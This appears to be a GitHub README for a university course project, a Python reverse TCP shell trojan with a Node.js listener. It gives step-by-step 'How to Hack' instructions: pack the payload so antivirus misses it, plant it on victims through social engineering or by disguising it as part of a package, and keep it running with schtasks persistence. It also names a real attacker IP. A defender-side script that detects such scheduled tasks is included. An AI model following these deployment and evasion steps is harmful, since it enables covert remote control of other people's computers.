LinuxSTAIN-zz/Python_Reverse_TCP

CS 460 Final Project

Reverse TCP Shell: a very simple trojan

  • ywang189 - Yiyi Wang
  • cjsmith7 - Christian Smith

Files provided

  • reverse_tcp.py
    • The malicious Python code; run it on the victim side.
    • Can be packed into an .exe with PyInstaller and run on Windows without being flagged by antivirus (tested on Windows 8.1 at the time of the project; that result should not be expected to hold against current AV signatures).
      • On Windows, run pyinstaller --noconsole --onefile reverse_tcp.py to pack the malicious reverse_tcp.py into a Windows executable.
  • listener.js
    • A simple listener written in JavaScript (Node.js).
    • Commands
      help
      exit                    ---   quit the listener
      list                    ---   list victims
      connect num             ---   connect to one victim
                                    e.g. 'connect 0' connects to the first victim in the victim list
      schedule n_minutes      ---   schedule the attack (Windows only): force the victim to try to connect to the attacker every n_minutes minutes
  • schtasks_template.xml (for the Windows hack only)
    • Sample template for the schtasks program on Windows.
    • e.g. to schedule a malicious task from schtasks_template.xml on Windows, run
schtasks /CREATE /XML path_to_schtasks_template.xml /TN malicious_task_name
  • dist/reverse_tcp.exe
    • The exe packed with PyInstaller as described above.
    • Don't run this file on your machine; it is dangerous (it will connect to the authors' attack machine at IP 45.55.139.173).
  • cleanup.bat (for Windows)
    • Removes our simple trojan from the victim's system.
    • Double-click it to clean up.

How to Hack (For Windows)

  1. Edit the variable attacker_ip in reverse_tcp.py to the attacker's IP address.
  2. Run pyinstaller --noconsole --onefile reverse_tcp.py to create reverse_tcp.exe.
  3. Copy reverse_tcp.exe to the victim's machine and execute it. (No console will pop up, so don't worry.)
  4. Run node listener.js on the attacker's machine to start listening for connections from victims. The listener has to be up when the victim connects; if it is not, the scheduled task simply tries again at the next interval (30 minutes by default).

How to Hack (For *nix)

  1. Edit the variable attacker_ip in reverse_tcp.py to the attacker's IP address.
  2. Run node listener.js on the attacker's machine to start listening for connections from victims. The scheduled-task persistence is Windows only, so on *nix the listener should already be running before the next step.
  3. Copy reverse_tcp.py to the victim's machine and run python reverse_tcp.py.

General description

  • On the attacker side, execute node listener.js to run the listener on the attacker's machine.
  • Plant and execute reverse_tcp.py on the victim machine (social engineering, disguising the .py file as part of a package, etc.).

How it works (For Windows)

  • reverse_tcp.py (reverse_tcp.exe) first copies itself to the %AppData% folder, then writes a schtasks_template.xml file for scheduling tasks.
  • It then runs the schtasks program to register a task that makes the victim try to connect to the attacker every 30 minutes by default.
  • After that, the victim tries to connect to the attacker's IP and port.
  • The attacker sends commands to the victim, and the victim executes them on its machine.
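As an added example (not code from the authors' repository), the following Python script is the defender-side check for the persistence mechanism described above and for the schtasks_template.xml file listed earlier: it parses a Task Scheduler task definition in the XML format that schtasks /CREATE /XML consumes and schtasks /Query /XML emits, and flags tasks whose action runs from a user-writable location such as %AppData% or whose trigger repeats at a short, beacon-like interval. The two task definitions embedded in it are constructed samples with made-up paths and dates, not the project's own template; only the element layout (the standard Task Scheduler schema) is real.

```python
import re
import xml.etree.ElementTree as ET

# Namespace of Task Scheduler task definitions (what schtasks /Create /XML consumes
# and schtasks /Query /XML emits).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a legitimate scheduled task rarely runs from but a dropped payload usually does.
USER_WRITABLE_MARKERS = ("%appdata%", "\\appdata\\roaming\\", "\\appdata\\local\\", "\\temp\\")

# Constructed sample (not the project's template): a task that relaunches an executable
# dropped in %AppData% every 30 minutes, i.e. the persistence described above.
SUSPICIOUS_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>victim</Author></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition>
        <Interval>PT30M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2016-11-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\victim\AppData\Roaming\reverse_tcp.exe</Command>
    </Exec>
  </Actions>
</Task>
"""

# Constructed sample of an ordinary maintenance task, to show the check discriminates.
BENIGN_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2016-11-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\defrag.exe</Command>
      <Arguments>C: /O</Arguments>
    </Exec>
  </Actions>
</Task>
"""


def iso_duration_minutes(duration):
    """Convert an ISO 8601 duration as used in task XML (PT30M, PT1H30M, P1D) to minutes.

    Returns None for anything that is not a plain day/hour/minute/second duration.
    """
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", duration.strip())
    if not m:
        return None
    days, hours, mins, secs = (int(g) if g else 0 for g in m.groups())
    return days * 1440 + hours * 60 + mins + secs / 60


def analyse_task(xml_text, max_beacon_minutes=60):
    """Return a list of findings for one exported task definition (empty list = nothing odd).

    Flags (1) Exec actions whose command lives in a user-writable directory and
    (2) repetition intervals of max_beacon_minutes or less, which is what a
    'phone home every N minutes' task looks like.
    """
    # Exported task files declare UTF-16; once the file is read into a str the declaration
    # only confuses the parser, so drop it before parsing.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(body)
    findings = []
    for exec_node in root.findall(".//t:Actions/t:Exec", NS):
        command = exec_node.findtext("t:Command", default="", namespaces=NS).strip()
        if any(marker in command.lower() for marker in USER_WRITABLE_MARKERS):
            findings.append(f"action runs from a user-writable path: {command}")
    for interval in root.findall(".//t:Repetition/t:Interval", NS):
        minutes = iso_duration_minutes(interval.text or "")
        if minutes is not None and minutes <= max_beacon_minutes:
            findings.append(f"trigger repeats every {minutes:g} minutes")
    return findings


if __name__ == "__main__":
    for label, xml_doc in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(label, analyse_task(xml_doc) or ["nothing flagged"])
```

On a live host, feed the function the output of schtasks /Query /TN task_name /XML (read the file with encoding='utf-16', since that is how schtasks writes it). A task it flags can be removed with schtasks /Delete /TN task_name /F, after which the executable the action points at still has to be deleted by hand.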

Why implement the reverse TCP attack in Python

We first tried Metasploit, used the windows/shell_reverse_tcp payload to generate the malicious exe, and also tried msfencode to encode it. No matter how we encoded the exe, Windows Defender always detected it (interestingly, some third-party AV products did not). After some research we found that Windows Defender loads the program into memory and scans it there, so encoding alone never works: an encoder only changes the bytes on disk, and once the stub has decoded the payload in memory the original payload is what gets scanned. A shell written from scratch has no such known payload to match.


What we learnt

  • Windows Defender is powerful.
  • Not all Metasploit payloads work on Windows.
  • Security awareness is important.
  • Security is fun. CS460 is an awesome class.

Thanks ;)

About

simple reverse tcp backdoor hack
